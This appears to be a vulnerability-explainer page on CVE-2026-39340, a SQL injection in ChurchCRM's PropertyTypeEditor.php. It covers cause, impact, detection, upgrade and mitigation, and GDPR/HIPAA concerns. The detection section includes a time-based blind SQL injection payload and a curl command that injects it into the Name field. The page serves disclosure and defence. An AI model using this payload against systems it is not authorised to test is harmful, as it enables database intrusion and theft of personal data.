Can you explain this vulnerability to me?

CVE-2026-39340 is a SQL injection vulnerability in ChurchCRM's PropertyTypeEditor.php file, affecting versions prior to 7.1.0.

The issue arose when the legacyFilterInput() function, which both stripped HTML and escaped SQL inputs, was replaced by sanitizeText(), which only strips HTML tags without escaping SQL.

Because user-supplied values from the Name and Description fields are concatenated directly into raw SQL INSERT and UPDATE queries without any SQL escaping, an attacker can inject malicious SQL code.

Any authenticated user with the MenuOptions role (a non-admin staff permission) can exploit this vulnerability to perform time-based blind SQL injection and exfiltrate data from the database.

Useful 0 Not Useful 0

How can this vulnerability impact me? :

This vulnerability allows an attacker with MenuOptions role access to fully compromise the ChurchCRM database.

• Extract all user accounts and password hashes, including bcrypt hashes that can be cracked offline.
• Read sensitive personal data such as names, addresses, family relationships, and donation history.
• Modify or delete arbitrary database rows.
• Enumerate the database schema.
• Escalate privileges by cracking passwords obtained from the database.

Useful 0 Not Useful 0

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by testing the input fields 'Name' and 'Description' in the PropertyTypeEditor.php administration interface for SQL injection. Specifically, submitting payloads such as ' OR SLEEP(5)=0 AND ' in the Name field can cause a measurable delay, indicating a time-based blind SQL injection vulnerability.

A practical detection method is to perform an authenticated test with a user having the MenuOptions role and observe if the application response is delayed when injecting time-based SQL payloads.

Example command using curl to test the injection (replace URL and session cookie accordingly):

• curl -X POST -b "PHPSESSID=your_session_id" -d "Name=' OR SLEEP(5)=0 AND '" -d "Description=test" https://yourchurchcrm.example.com/PropertyTypeEditor.php

If the response is delayed by approximately 5 seconds, it confirms the presence of the vulnerability.

Useful 0 Not Useful 0

What immediate steps should I take to mitigate this vulnerability?

The immediate mitigation step is to upgrade ChurchCRM to version 7.1.0 or later, where this SQL injection vulnerability has been fixed.

If upgrading is not immediately possible, restrict or remove the MenuOptions role from users who do not require it, as this role is required to exploit the vulnerability.

Additionally, avoid using the vulnerable PropertyTypeEditor.php functionality until the patch is applied.

Long-term mitigation involves restoring the use of legacyFilterInput() which performs both HTML stripping and SQL escaping, or refactoring the code to use prepared statements with parameter binding to prevent SQL injection.

Useful 0 Not Useful 0

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The SQL injection vulnerability in ChurchCRM allows any authenticated user with the MenuOptions role to exfiltrate sensitive data from the database, including password hashes and personal information such as names, addresses, family relationships, and donation history.

This exposure of sensitive personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and breaches.

The vulnerability enables attackers to read, modify, or delete arbitrary database rows and escalate privileges, increasing the risk of data breaches and unauthorized data disclosure, which are critical compliance concerns under these standards.

Useful 0 Not Useful 0